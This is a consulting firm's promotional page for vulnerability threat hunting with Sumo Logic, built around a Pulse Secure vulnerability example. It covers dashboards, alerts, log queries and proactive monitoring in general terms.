Vulnerability Threat Hunting With Sumo Logic

Have Sumo Logic?

If you answered both of the above questions with a YES, then continue reading further.

Ever wondered how exactly does the process for vulnerability assessment works?  Or better what, ever wondered how to respond to the vulnerability threats in a multi security vendor environment while having access to tool like Sumo Logic?

Here is the how.

Vulnerability comes out, customers with already existing security solutions and vendors get automated patches rolled out that solve vulnerability, yet the reality of it all, not all security solutions automatically solve security related vulnerabilities. Many don’t. In fact it depends on the type of vulnerability and it’s complexity.

How can our company help?

  • We can help reduce risk for your environment, by helping customers visualize potential threats in Sumo Logic dashboards in combination with helping customers evaluate and analyze latest vulnerability threats that may arise from your existing applications/devices.
  • Many of our customers already have existing security solutions, yet lack the clarity of the actionable steps needed to resolve vulnerabilities related issues.
  • With Sumo Logic help we can create custom queries, that keep tabs on the most critical vulnerabilities.  We can review each of your existing security solution to see if we can integrate it with Sumo Logic.  We can create dedicated alerts that will identify the problem based on the resolution steps associated with the vulnerability.
  • We can check different threat group forums for your critical applications/devices and analyze vendor recommendations to see what the symptoms  of the exploit is and map out necessary identifies in Sumo Logic, helping customers get notified when vulnerability is being exploited.

Use Case example:

Let’s pretend your Pulse Secure appliance became vulnerable due to latest vulnerability.  You as the customer would like someone to analyze what the fix is, and provide necessary recommendations, helping your company implement a fix.  Our company can help you integrate the fix, as well as helping your company identify if vulnerability is actively being exploited.  We would leverage Sumo Logic to identify relevant log patterns per Pulse Secure vendor recommendation and notify customer if vulnerability is being exploited or actively scanned/targeted.

Often when vulnerability is discovered, our customers already know about it, either from existing subscriber feeds or other methods. Knowing is one thing, fixing vulnerability related problem is another.

What would the typical fix be?

Sometimes customers upgrade their appliance, application to address vulnerability, other times customers isolate their existing appliance from their network.

Why DBA Binary Fusion?

There are simply way too many vendors to keep track of and way too many critical applications to monitor or keep track of.  Our company have specialized Sumo Logic monitoring experts as well as other network/application monitoring experts  and Security Professionals grouped together to help your company identify vulnerabilities and monitor your existing environment.

How exactly does our service work?

We provide 2 types of security services.

Reactive and Proactive vulnerability threat hunting services.

Here is how our vulnerability threat hunting works reactively 

  • We gather list of applications you need to defend (pick the most critical ones to start with as the priority), we subscribe to watch lists associated with your application and any of the application dependencies (for example vendors who support application/appliance/device).  We rely either on your already existing vulnerability scanning solution such as Nessus or Qualys/Retina or other to types of vulnerability assessment/scanning tool or help you pick the right scanning solution for your organization to be managed directly by your already existing IT Security team.
  • When we learn what the vulnerability is all about, we analyze vendor recommendations, to see what the recommended actions are.  Our company augments your already existing IT Security team and helps your team with heavy lifting.  
  • Meaning when vulnerability is discovered, often what customers do is they begin working with their internal teams to resolve the issue, however recommendations from vendors for fixing vulnerability can be quiet extensive.  Ranging from applying all sorts of patches, to verifying hash values, upgrading systems, verifying if other systems or impacted, creating alerts to see if system is still being exploited etc, to doing all sorts of things just to see if the system/application is vulnerable  while executing due care.  (after all if customers don’t perform their due dilegence, that will not be kindly reflected especially during security audit.)

So how exactly DBA Binary Fusion can help customers ?

Our company can help by sniffing out the threats in your environment.  Meaning we would review the vulnerability, see what the recommendation from vendor is, and would work with your existing IT team to notify and provide appropriate security related recommendations that would help your company reduce risk.

What Kind Of Security Recommendations?

  • To help you better understand what kind of recommendation, let’s take a good use case example of Pulse Secure vulnerability.  Let’s say vulnerability was discovered on Pulse Secure appliance, your IT team became aware of this, either by being notified by the vendor or by being notified from the watchlist or any other method. 
  • Then DBA Binary Fusion consultants would analyze vulnerability, view level of criticality associated with the vulnerability for example if you have some AD LDAP service enabled and not running LDAPS yet, but vulnerability happen to be related to LDAP, then we would provide you recommendation for your appliance to be updated with LDAPS.   
  • However, that’s just one example of security recommendation.  In fact many of such recommendations are already provided within the scanning tools themselves, we simply reinforce the need for customer to make sure that these recommendations get executed and not forgotten. 
  • One way of doing this is to have consistent level of reporting, the type of reporting that we can keep track of by creating dedicated Sumo Logic dashboards tracking multiple types of vulnerabilities based on different tiers and characteristics.   
  • Our Sumo Logic Security specialized subject matter experts can created dedicated dashboards helping you keep track of vulnerabilities.
  • Additionally upon analyzing vulnerability our consultants can create an alert and dedicated dashboard that would keep track of any risks/threats associated with the latest vulnerability.   This way customer’s internal IT teams can see these risks based on operational/technical/executive level grouping.
  • Visualization of vulnerabilities is only small subset of our service offerings.  In addition to visualizing your riskiest vulnerabilities and grouping them based on type of devices and applications, we actually end up writing specific threat hunting queries associated with the distinct signatures of the vulnerability.
  • The very same queries that  are used to notify customers if their systems/applications being targeted.

How does threat hunting service really works?

  • We analyze recommendations from the vendors associated with your application. 
  • For example sometimes recommendations from the vendor can be related to simply looking at specific public ip addresses that exploiting vulnerability, in which case we would provide recommendations to our customers to turn on additional logging on Pulse Secure appliances for example, then create special queries in Sumo Logic that will capture presence of these IP addresses, based on rarity and other types of characteristics. 
  • We also have AI and ML subject matter experts who can even assist in creating AI + ML models capturing specific network traffic behavior helping customers identify specific issues quicker.
  • We build the custom models based on the patterns associated with the specific vulnerability.
  • We visualize this pattern or multiple patterns in dashboards.

How does proactive vulnerability threat hunting service work?

When it comes to pro-actively security your company’s environment it’s important to consider entire layer 1 through layer 7 OSI reference model, and important to secure every single layer.  That is precisely what DBA Binary Fusion company helps customers do.

We do this taking best security practices multi vendor approach.  

  • When engaging with the customer we analyze critical applications and systems, then simply identify dependencies and all the necessary KPIs that keeps their business moving.  During the process of engagement we review customer’s environment and perform environment assessment.  During this process we identify vendors who supporting applications/systems/services.  Then we analyze recommended security practices from the vendor and see if we can visualize threats or potential possibilities of risks by simply following MITRE ATT&CK knowledgebase, mapping out all of the possible misconfigurations that may result in increased risk.
  • For example sometimes developers like to execute some power shell scripts, that have specific curl commands.  Some of these curl commands can be spotted, depending on the level of logging, without doing any deep packet inspection.  Although some of these curl commands can be easy to spot, depending on customer’s environment, in many cases it’s very difficult to spot and almost impossible if there is no proper monitoring resources configured in customer’s environment.
  • Our company helps customers spot these invisibilities, as well as helps customers identify most common security related queries that would makes sense to produce in Sumo Logic based on the customer’s environment architecture.
  • Meaning we actually analyze customer’s architecture and see how data is secured in transit and at rest.
  • We look at what agents and agentless monitoring tools customer has.  
  • If we see visibility issue, no distributed tracing, no logging, no appropriate devices in between to help customers increase security and visibility, then we provide our recommendations and help customers reduce costs either by helping them pick the right security monitoring solution for their environment or work with the existing environment, or even help customers by developing dedicated solution specifically based on customer’s needs.
  • Many customers who are looking for security pro-active services already have security in house team and already have for example system administrators and enterprise team to tackle complicated integrations with security vendors.  Yet many customers simply don’t have time to hunt for the most probable threat signatures that matters to customers most.   Simply because each application, has it’s own complexity and it’s own set of functions with many individual sub-functions and dependencies where some of them may have higher than usual elevated risk and some of them don’t.
  • In fact we mind many customers that already invested in specific tool like DarkTrace or other tool, but need additional level of verification if specific access request from an individual IP is legit or not.  In many cases such determination requires the use of multiple vendors, jumping the hoops between one vendor and another just to see if packet request is legit.  Our company can unify into singular dashboard in Sumo Logic threat intel relevant information based on multiple data sources from multiple vendors.   Helping analysts create informative decision about what should be thoroughly looked into and what should not be heavily looked into.
  • Our company can review not only what’s inside the packet header to tell you if something is legit, but we can go beyond the header and look at the system processes, and ingest that information from system processes into Sumo Logic.  Making it possible to detect issues at both packet header level and system level, something that many of our customers looking for. 
  • Also many customers wants to see chaining of events as well, where the user executes the command than types another command and then executes a script and that script causes further action, that results in some other action.  With the help of DBA Binary Fusion automation experts, we can capture internal processes and visualizes them side by side with the packet header detailed info, helping customers stay secure.
  • There are so many different power shell commands and windows commands and linux CLI or shell commands that can all be the source of a malecious attempt to do something bad… Why not capture these attempts, why not visualize them, why not display them side by side together with the other malecious attempts that are discovered in the packet header?

There are simply too many Why Nots….  Let these “Why Nots” be no longer… with the help of DBA Binary Fusion proactive consulting services.

Contact us for more info.